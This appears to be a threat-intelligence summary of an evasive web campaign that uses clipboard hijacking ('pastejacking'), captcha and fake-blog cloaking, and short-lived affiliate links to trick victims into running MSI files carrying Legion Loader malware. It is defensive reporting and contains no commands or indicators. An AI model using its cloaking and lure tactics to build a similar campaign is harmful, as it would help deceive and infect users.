Evasive Campaign Pushing Legion Loader Malware
Essential information
- Published
- 11/04/2025 09:01
- Modified
- 11/04/2025 10:25
- Tags
- 2025-04-11 affiliate links clipboard hijacking cloaking pastejacking
- Related entities
- 83 observables, 6 techniques (mitre), 1 malware
Description
A highly evasive web campaign is exploiting clipboard hijacking to trick users into running MSI files containing Legion Loader malware. The campaign employs multiple cloaking strategies, including captcha pages, disguised blog sites, and dynamic download URLs. The malicious script instructs victims to paste content into a Run window, which downloads and displays the MSI file. The campaign uses TDS traffic or affiliate links with short-lived parameters to lead victims to malicious download pages. When accessed without valid parameters, the URLs display benign content. The campaign's infrastructure includes 76 domains resolving to a single IP address, all disguised as blog sites.